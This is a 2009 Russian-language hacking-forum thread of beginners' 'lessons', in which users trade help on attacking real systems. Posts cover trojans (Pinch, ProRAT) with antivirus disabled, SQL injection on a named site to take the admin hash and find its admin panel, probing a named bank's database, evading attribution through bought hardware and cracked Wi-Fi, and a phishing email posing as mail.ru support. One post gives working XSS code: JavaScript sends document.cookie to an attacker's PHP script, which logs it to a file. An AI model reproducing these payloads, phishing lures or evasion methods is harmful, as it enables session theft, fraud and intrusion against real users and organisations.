RE: Уроки от Xakep9009(для новичков!)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-11 14:48:18.723333
|
|
|
onek
Сообщений: 202
Оценки: 0
Присоединился: 2009-01-25 01:34:52.640000
|
farex наконецто нашол ксс…….но в другом сайте….)
Филитр ваше примитив был……..фильтрировал только цифры в алерте))
Все ушол шаманить)
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-11 18:44:09.983333
|
|
|
Sakar
Сообщений: 116
Оценки: 0
Присоединился: 2008-09-17 13:33:33.223333
|
quote:
ORIGINAL: farex
quote:
ORIGINAL: Sakar
Народ помагите как подключится к хосту через определённый порт (открытый) или во всяком случае как на сайте www.nevabank.ru подключиться к БД через 5432 порт, с помощью учетной записи R - �M‡•ђ (XSpider выдал)
�M‡•ђ - это не лгин учетной записи……
То есть логин только зашифрованный…..
Мне напоминает шифр из ascii - (но я могу ошибаться)
Спасибо конечно, но только что-то мне от этого не легче как этим возпользоваться?
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-11 19:22:57.460000
|
|
|
onek
Сообщений: 202
Оценки: 0
Присоединился: 2009-01-25 01:34:52.640000
|
если я юзаю анонимайзер Tor ….то могу я бомбить сайт и небеспокоится о безопасности??? Или самим тором необойтись…..
И еще что лутше тор или прокси?
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-11 19:33:27.926666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
если я юзаю анонимайзер Tor ….то могу я бомбить сайт и небеспокоится о безопасности??? Или самим тором необойтись…..
И еще что лутше тор или прокси?
Если захотят найти - найдут. Говорилось сотню раз..
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-11 20:38:15.513333
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
quote:
ORIGINAL: onek
если я юзаю анонимайзер Tor ….то могу я бомбить сайт и небеспокоится о безопасности??? Или самим тором необойтись…..
И еще что лутше тор или прокси?
Покупаеш новое железо(слово новое значит не твое), конкректнее нетбук, ноутбук…
При том покупаеш не у себя в городе(лучше в другой области,или СТРАНЫ :) ), где нить на тоганке.
Находиш симку сотового оператора ( не на тя долна быть естественно,сотик тоже не на тя), либо гденить wi-fi ломаеш +еще варианты….
Проводиш взлом….
Скидываеш железо (не в том городе где покупал)
Тогда где - то 99% что не впалят кто сделал
Немного накладно….Но безопасно…:)
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-11 22:15:08.993333
|
|
|
RuND
Сообщений: 4
Оценки: 0
Присоединился: 2009-03-10 23:33:09.413333
|
Здравствуйте! У меня вопрос по 6 уроку. Создал трояна, создал 2 учетные записи на mail.ru(на mail.tut.by ошибка ajaxa была) тестил на своем компьютере… у каспера отключил почтовый антивир и файл. антивир. Оставил антихак т.к. ко мне с локалки ломятся… добавил трояна в доверенную зону. Запустил трояна. Ничего не произошло. Ни одного сообщения не было ни отправлено, ни принято, ни на одном из почтовых ящиков. Жду помощи. Заранее спасибо
PS xakep9009 +999999999999999999999999999999999999999999999999999999999999999999999999999999999
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-11 22:40:04.386666
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
1:Сколько раз повторять что на mail.tut.by отчеты больше не приходят.
2:Читай топы начиная с первого, на эту тему ты их штук 300 найдешь.
4:Читай топы начиная с первого, на эту тему ты их штук 300 найдешь.
5:Читай топы начиная с первого, на эту тему ты их штук 300 найдешь
6:Читай топы начиная с первого, на эту тему ты их штук 300 найдешь
7:Читай топы начиная с первого, на эту тему ты их штук 300 найдешь
8:Читай топы начиная с первого, на эту тему ты их штук 300 найдешь
9:Читай топы начиная с первого, на эту тему ты их штук 300 найдешь
10:Читай топы начиная с первого, на эту тему ты их штук 300 найдешь
PS Читай топы начиная с первого, на эту тему ты их штук 300 найдешь!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-11 22:58:05.246666
|
|
|
papillon
Сообщений: 21
Оценки: 0
Присоединился: 2009-02-17 16:59:49.483333
|
Друзья выручайте, такая проблема сниффер, который выкладывал Хакер9009, чето мудрить стал, думал дело в WinPcap'е, скачал с Net'а другой. И сниффера тоже качнул нового. Выдает ашибку- PCAP error: Error opening the networking adapter. В Googl'e ничего найти не смог. Вот прошу помочь.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-11 22:59:47.510000
|
|
|
RuND
Сообщений: 4
Оценки: 0
Присоединился: 2009-03-10 23:33:09.413333
|
Тут 49 страниц… если знаешь - то можно и сказать… <_<
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-11 23:00:42.310000
|
|
|
onek
Сообщений: 202
Оценки: 0
Присоединился: 2009-01-25 01:34:52.640000
|
Кто в XSS нормально шарит дайте плиз асю ….пару вопросиков есть….или мне постучите 379866850
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-11 23:03:30.610000
|
|
|
free_kode
Сообщений: 505
Оценки: 0
Присоединился: 2008-10-24 15:19:05.420000
|
papillon типа интерфейс занят мож или его надо перевести в режим сканирования. Попоробнее
onek эх…ты в асе, я может чем бы и помог только в jabber
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-11 23:14:34.830000
|
|
|
papillon
Сообщений: 21
Оценки: 0
Присоединился: 2009-02-17 16:59:49.483333
|
RuND
если твои вопросы по поводу pincha пиши в асю 459985919
free_kode
Как я понил говорит типа не найден адаптер подключения к Net'у
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-11 23:21:25.546666
|
|
|
free_kode
Сообщений: 505
Оценки: 0
Присоединился: 2008-10-24 15:19:05.420000
|
papillon какая ОСь? он пишет что не могу открыть сетевой адаптер
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-11 23:26:45.776666
|
|
|
papillon
Сообщений: 21
Оценки: 0
Присоединился: 2009-02-17 16:59:49.483333
|
free_kode
…XP стоит, выход через встроенный модем.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 08:28:38.206666
|
|
|
D.Darco
Сообщений: 44
Оценки: 0
Присоединился: 2009-01-15 16:02:28.453333
|
quote:
ORIGINAL: Invisible_xakep
я тут новичек и незнаю о чем тут писали!
Ты предлагаешь свою помощь не зная, что было написано раньше, а т.к. ты не знаешь что писалось раньше - где гарантия что то что ты предложил не предлагал кто-то другой… Читай тему с самого начала тогда может быть начнешь задавать меньше тупых вопросов…
А по поводу пора или нет писать новый урок… Ты что - пуп земли ??? из-за тебя одного его писать что ли ??? Многие хотят новый урок, но в отличие от тебя не ноют ибо не хотят засорять тему лишними постами.. Задумайся над моими словами может что и поймешь…
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 08:31:30.680000
|
|
|
D.Darco
Сообщений: 44
Оценки: 0
Присоединился: 2009-01-15 16:02:28.453333
|
quote:
ORIGINAL: farex
1:Сколько раз повторять что на mail.tut.by отчеты больше не приходят.
2:Читай топы начиная с первого, на эту тему ты их штук 300 найдешь.
4:Читай топы начиная с первого, на эту тему ты их штук 300 найдешь.
5:Читай топы начиная с первого, на эту тему ты их штук 300 найдешь
6:Читай топы начиная с первого, на эту тему ты их штук 300 найдешь
7:Читай топы начиная с первого, на эту тему ты их штук 300 найдешь
8:Читай топы начиная с первого, на эту тему ты их штук 300 найдешь
9:Читай топы начиная с первого, на эту тему ты их штук 300 найдешь
10:Читай топы начиная с первого, на эту тему ты их штук 300 найдешь
PS Читай топы начиная с первого, на эту тему ты их штук 300 найдешь!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
не обязательно писать 11 раз одно и то же.. подкорректируй сообщение - слишком много места занимает…
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 12:45:08.570000
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
quote:
D.Darco
Да конечно места потрачено много………
Это была попытка обратить внимания чела на то, что на форуме уже лежат все ответы на вопросы по трою…..
quote:
RuND
Тут 49 страниц… если знаешь - то можно и сказать… <_<
Эта тема на столько разжована здесь, что повторятся пустая трата времени……..
Посмотри все посты прояви уважения к людям, которые специально постили советы по пинчу….
Пример: почитал определенный пост по интересующей тебя теме (где кто либо объясняет как у него получилось сделать это и какие трудности возникли на пути)….
Обдумал, если чего то не догнал, напиши в личку к автору поста (PM)
Соответственно и ответы на интересующие вопросы получишь быстрее..
Опять пост получился большой…..
PS. Больше флудить не буду.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 13:48:35.480000
|
|
|
Sakar
Сообщений: 116
Оценки: 0
Присоединился: 2008-09-17 13:33:33.223333
|
Народ помогите, на сайте http://www.stplus.ru/ через sql-inj получил логин, и хеш админа, расшифровал, все хорошо, как теперь этим воспользоваться?
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 13:49:19.650000
|
|
|
papillon
Сообщений: 21
Оценки: 0
Присоединился: 2009-02-17 16:59:49.483333
|
Парни, повторюсь по поводу сниффера никто не сможет помочь?
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 14:37:55.030000
|
|
|
Sakar
Сообщений: 116
Оценки: 0
Присоединился: 2008-09-17 13:33:33.223333
|
Могу только сказать что у меня такая же проблема, у меня сетевая карта встроеная
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 14:39:10.073333
|
|
|
Sakar
Сообщений: 116
Оценки: 0
Присоединился: 2008-09-17 13:33:33.223333
|
quote:
ORIGINAL: RuND
Здравствуйте! У меня вопрос по 6 уроку. Создал трояна, создал 2 учетные записи на mail.ru(на mail.tut.by ошибка ajaxa была) тестил на своем компьютере… у каспера отключил почтовый антивир и файл. антивир. Оставил антихак т.к. ко мне с локалки ломятся… добавил трояна в доверенную зону. Запустил трояна. Ничего не произошло. Ни одного сообщения не было ни отправлено, ни принято, ни на одном из почтовых ящиков. Жду помощи. Заранее спасибо
PS xakep9009 +999999999999999999999999999999999999999999999999999999999999999999999999999999999
Даже если ты читал урок, ты бы прочитал что на майл.ру это не работало ещё когда урок писался
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 15:45:20.670000
|
|
|
grubby
Сообщений: 5
Оценки: 0
Присоединился: 2009-02-20 18:51:35.036666
|
quote:
Урок 9.
ProRAT
При создании сервера выдает ошибку "невозможно изменить значок сервера"
Пробовал другие значки и просто без самого значка, всёравно не катит…
Помогите плииззз!!!!
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 15:57:59.410000
|
|
|
John.
Сообщений: 448
Оценки: 0
Присоединился: 2008-06-06 13:46:52.593333
|
quote:
Парни, повторюсь по поводу сниффера никто не сможет помочь?
http://forum.xakep.ru/fb.aspx?m=1249199
читай..нормально написан.. самописный сниффер
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 18:29:45.400000
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
quote:
ORIGINAL: Sakar
Народ помогите, на сайте http://www.stplus.ru/ через sql-inj получил логин, и хеш админа, расшифровал, все хорошо, как теперь этим воспользоваться?
Найди админку сайта.
1. Через скул инъекцию, с помощью load_file()
2. Использовать сканеры, например xspider или wvs
3. Если движок не самописный, поискать исходники и скачать.
В добавок вход в админку может осуществлятся через другой домен.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 20:18:54.426666
|
|
|
Sakar
Сообщений: 116
Оценки: 0
Присоединился: 2008-09-17 13:33:33.223333
|
Эээ… А поподробней можно, хоть что нибудь, если ты про хост, то я его, нашел, но там логин и пасс админа не подходят
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 20:39:40.813333
|
|
|
Cergey94
Сообщений: 247
Оценки: 0
Присоединился: 2009-01-04 19:08:46.476666
|
quote:
ORIGINAL: Sakar
Эээ… А поподробней можно, хоть что нибудь, если ты про хост, то я его, нашел, но там логин и пасс админа не подходят
тебе обязательно надо всё разжевать и в рот положить ?
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 21:12:30.096666
|
|
|
papillon
Сообщений: 21
Оценки: 0
Присоединился: 2009-02-17 16:59:49.483333
|
John
По твоей ссылке прошол, нет там ни чего, кто нить знает можт какой альтернотивный сниффер?
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 22:01:14.546666
|
|
|
onek
Сообщений: 202
Оценки: 0
Присоединился: 2009-01-25 01:34:52.640000
|
про всё писать не буду, времени нехватка :( , напишу немножко:
Есть возможность инклудить( вставлять ) свой js скрипт на атакуемую страницу сайта с помошью так называемого xss-вектора, делается это так:
1) создаём атакующий js скрипт, для этого создаём cook.js(в блокноте, затем меняем разрешение), внутри прописываем следующие:
document.write('<ifrаmе width=1 height=1 style="position: absolute; visibility: hidden;" src="'+'ваш_сайт/cook.php'+'?host='+location.host+'&cook='+document.cookie+'"></ifrаmе>');
2)создаём файл cook.php в него пишем:
<?php
$file = fopen("cookies.txt","a");
fputs($file,"[".date("d.m.y H:i")."]: host=".$_GET['host'].", COOKIES=".$_GET['cook']."\r\n");
fclose($file);
?>
3)создаём файл cookies.txt, пустой.
теперь заливаем эти три файла на сервер ( естественно вам понадобится хостинг, локал-машин не советую использовать для подобных целей) и смотрим путь до этих файлов, примерно:
http://домен_сайта/директория_в_которую_залили_cook.js/cook.js
в итоге мы получаем вектор, ворующий кукисы, отправляющий их на снифер ( cook.php ) ,который записывает их в текстовый файл (cookies.txt) и выглядит он так:
<sсriрt src=ttp://домен сайта/директория,в которую залили/cook.js></sсriрt>
теперь вы можете его вставлять в параметры, узявимые xss-у и получать отчёты…
это самый элементарный пример xss-вектора.
не взялся писать про ддос с помощью xss, тут должен отписаться более опытный человек
п.с. - инфа взята из мозга, возможны некоторые неточности, гуру прошу не пинать, я веть тожу только учусь =)
====================================================
И куда ты смотрел???
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 22:22:57.920000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
#1953
ахах что подняли, написано по-ламерски, ужасьно :)
quote:
Народ помогите, на сайте http://www.stplus.ru/ через sql-inj получил логин, и хеш админа, расшифровал, все хорошо, как теперь этим воспользоваться?
как совесть позволит, если админы там живые, сообщи
quote:
По твоей ссылке прошол, нет там ни чего, кто нить знает можт какой альтернотивный сниффер?
а посидеть 3 недели над php или perl … и самому написать снифер? в этом случае, кстати, возможен побочный эффект - прекратить маяться дурью и всерьёз заняться программированием ( не формочки клепать, а именно на уровни Алгоритмов ) . Более чем приятный эффект, не правда ли?
Сакар, чего ты там не понимаешь? Ты же вроде шаришь более - менее в вебе, или я тебя с кем-то спутал? у тебя вроде работа с этим связана (с CMS). ы?
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 22:27:15.993333
|
|
|
papillon
Сообщений: 21
Оценки: 0
Присоединился: 2009-02-17 16:59:49.483333
|
onek
…не догнал это ты мне написал. …если да то я по поводу сниффера спрашивал (EffeTech HTTP Sniffer) че не пашит говорю…?
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 22:31:43.773333
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
ORIGINAL: papillon
onek
…не догнал это ты мне написал. …если да то я по поводу сниффера спрашивал (EffeTech HTTP Sniffer) че не пашит говорю…?
причину? пожалуйста -
1.ты не способен его настроить
т.к.
1.1. либо кривые руки
1.2. либо ты не знаешь как и по-какому принципу он работает
следствие - читай доки, не поможет goto 1.1.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 22:33:34.616666
|
|
|
papillon
Сообщений: 21
Оценки: 0
Присоединился: 2009-02-17 16:59:49.483333
|
Народ всему есть своё рациональное обьеснение, если прога на одной машине паши, а на другой нет, то дело в компе. (Я поэтому обратился спросить может у меня настройки надо под рехтовать под сниффер, не ужели не кто с этим не сталкивался, а если сталкивался то плюнул на это дело…)
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 22:36:04.060000
|
|
|
papillon
Сообщений: 21
Оценки: 0
Присоединился: 2009-02-17 16:59:49.483333
|
brtn
ну скажем что настраевать надо комп, а не сниф. потому как там особо и настраивать нечего.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-12 22:38:13.430000
|
|
|
onek
Сообщений: 202
Оценки: 0
Присоединился: 2009-01-25 01:34:52.640000
|
papillon извини …я думал сниффер для кражи кукисов
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-13 00:00:45.670000
|
|
|
grubby
Сообщений: 5
Оценки: 0
Присоединился: 2009-02-20 18:51:35.036666
|
У кого нить с Prorat была проблема, при создании сервера выдает ошибку "невозможно изменить значок сервера"???
Помогите..не знаю че делать…
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-13 00:16:05.383333
|
|
|
FrozenBoy
Сообщений: 65
Оценки: 0
Присоединился: 2008-01-08 19:35:30.780000
|
Хакер9009 , оч нравятся твои статьи ))) Так держать!
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-13 00:47:43.553333
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
Вот тебе пример СИ на mail……
С анонимной отправки писем пишешь письмо со следующем содержанием….
Отправитель: suport@corp.mail.ru
Тема: Мой мир
"Чье нить имя" из вашего мира прислал вам личное сообщения для получения пройдите по ссылке
Что то в этом роде ….. Давно не пользовался mail.ru..не помню точно как они там пишут.
Моно еще вариантов кучу придумать………
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-13 06:28:25.246666
|
|
|
TRUB
Сообщений: 7
Оценки: 0
Присоединился: 2009-03-13 06:06:04.580000
|
Всеп привет! Помогите !!!СПАСИТЕ!!!!!! Я где-то месяц назад увидел этот топик!Немного первых уроков прошол, потом решил немного поучиться, не заходил где-то месец, как зашол , упал в ужас!))) форум ростёт не по дням а по часам!))я понимаю что задавать щас вопросы по тем урокам которые прошли давным давно, задавать вопросы как-то глупо, и нехочу засирать форум, если есть добрые люди))) дайте пару часных уроков,чтоб в основном розобраться, и для вас это будет не лишним)) ведь повторение мать учения!Зарание спасибо, если у кого-то проснулось чуство гордости , и он хочет побыть в роли учителя пишите в личку !От туда свяжемся!
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2009-03-13 10:08:18.236666
|
|
|
Sakar
Сообщений: 116
Оценки: 0
Присоединился: 2008-09-17 13:33:33.223333
|
btrn - все таки ты меня с кем то спутал, а админы там вряд ли живые видео про взлом этого сайта видео на webxaker.ru
|
|
|
|
|
|
